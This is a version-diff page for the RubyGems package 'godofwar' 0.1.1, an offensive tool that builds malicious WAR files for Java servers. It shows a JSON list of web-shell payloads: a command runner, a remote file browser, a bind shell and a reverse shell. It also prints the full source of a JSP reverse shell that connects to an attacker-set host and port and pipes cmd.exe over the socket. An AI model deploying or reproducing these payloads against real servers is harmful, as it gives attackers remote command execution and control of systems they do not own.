RubyGems - godofwar - Versions diffs - 0.1.1 - Mend

godofwar 0.1.1

Files changed (21) hide show

checksums.yaml +7 -0
data/CODE_OF_CONDUCT.md +74 -0
data/Gemfile +4 -0
data/Gemfile.lock +19 -0
data/README.md +132 -0
data/Rakefile +2 -0
data/bin/godofwar +77 -0
data/godofwar.gemspec +26 -0
data/lib/godofwar.rb +20 -0
data/lib/godofwar/builder.rb +137 -0
data/lib/godofwar/extensions.rb +29 -0
data/lib/godofwar/payloads.rb +105 -0
data/lib/godofwar/utils.rb +48 -0
data/lib/godofwar/version.rb +3 -0
data/payloads/bind_shell/bind_shell.jsp +60 -0
data/payloads/cmd_get/cmd_get.jsp +28 -0
data/payloads/filebrowser/example-css.css +50 -0
data/payloads/filebrowser/filebrowser.jsp +1934 -0
data/payloads/payloads_info.json +30 -0
data/payloads/reverse_shell_ui/reverse_shell_ui.jsp +63 -0
metadata +80 -0

data/payloads/payloads_info.json ADDED Viewed

@@ -0,0 +1,30 @@
+{
+  "cmd_get": {
+    "desc"  : "Command execution via web interface",
+    "os"    : "any",
+    "conf"  : {},
+    "url"   : "http://host/cmd.jsp?cmd=whoami",
+    "ref"   : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
+  },
+  "filebrowser": {
+    "desc"  : "Remote file browser, upload, download, unzip files and native command execution",
+    "os"    :  "any",
+    "conf"  : {},
+    "url"   : "http://host/filebrowser.jsp",
+    "ref"   : ["http://www.vonloesch.de/filebrowser.html"]
+  },
+  "bind_shell": {
+    "desc"  : "TCP bind shell",
+    "os"    : "any",
+    "conf"  : {"port": 4444},
+    "url"   : "http://host/reverse-shell.jsp",
+    "ref"   : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
+  },
+  "reverse_shell_ui": {
+    "desc"  : "TCP reverse shell with a UI to set LHOST and LPORT from browser.",
+    "os"    : "windows",
+    "conf"  : {"host": "attacker", "port": 4444},
+    "url"   : "http://host/reverse_shell_ui.jsp",
+    "ref"   : []
+  }
+}

data/payloads/reverse_shell_ui/reverse_shell_ui.jsp ADDED Viewed

@@ -0,0 +1,63 @@
+<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+<form method="post">
+LHOST: <input type="text" name="ip"   size=12 value="HOSTHOST"><br />
+LPORT: <input type="text" name="port" size=12 value="PORTPORT"><br />
+<input type="submit" name="Connect" value="Connect"><br />
+</form>
+<%
+String ipAddress = request.getParameter("ip");
+String ipPort = request.getParameter("port");
+if(ipAddress != null && ipPort != null){
+    class StreamConnector extends Thread
+    {
+        InputStream is;
+        OutputStream os;
+        StreamConnector( InputStream is, OutputStream os )
+        {
+        this.is = is;
+        this.os = os;
+        }
+        public void run()
+        {
+        BufferedReader in  = null;
+        BufferedWriter out = null;
+try
+{
+    in  = new BufferedReader( new InputStreamReader( this.is ) );
+    out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+    char buffer[] = new char[8192];
+    int length;
+    while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+    {
+        out.write( buffer, 0, length );
+        out.flush();
+    }
+} catch( Exception e ){}
+try
+{
+    if( in != null )
+        in.close();
+    if( out != null )
+        out.close();
+} catch( Exception e ){}
+        }
+    }
+    try
+    {
+      Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
+        Process process = Runtime.getRuntime().exec( "cmd.exe" );
+        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+    } catch( Exception e ) {}
+}
+%>

metadata ADDED Viewed

@@ -0,0 +1,80 @@
+--- !ruby/object:Gem::Specification
+name: godofwar
+version: !ruby/object:Gem::Version
+  version: 0.1.1
+platform: ruby
+authors:
+- KINGSABRI
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2019-04-05 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: rubyzip
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: Evil war builder for hackers with built-in war payloads.
+email:
+- king.sabri@gmail.com
+executables:
+- godofwar
+extensions: []
+extra_rdoc_files: []
+files:
+- CODE_OF_CONDUCT.md
+- Gemfile
+- Gemfile.lock
+- README.md
+- Rakefile
+- bin/godofwar
+- godofwar.gemspec
+- lib/godofwar.rb
+- lib/godofwar/builder.rb
+- lib/godofwar/extensions.rb
+- lib/godofwar/payloads.rb
+- lib/godofwar/utils.rb
+- lib/godofwar/version.rb
+- payloads/bind_shell/bind_shell.jsp
+- payloads/cmd_get/cmd_get.jsp
+- payloads/filebrowser/example-css.css
+- payloads/filebrowser/filebrowser.jsp
+- payloads/payloads_info.json
+- payloads/reverse_shell_ui/reverse_shell_ui.jsp
+homepage: https://github.com/KINGSABRI/godofwar
+licenses:
+- MIT
+metadata:
+  homepage_uri: https://github.com/KINGSABRI/godofwar
+  source_code_uri: https://github.com/KINGSABRI/godofwar
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project:
+rubygems_version: 2.7.6
+signing_key:
+specification_version: 4
+summary: Evil war builder for hackers with built-in war payloads.
+test_files: []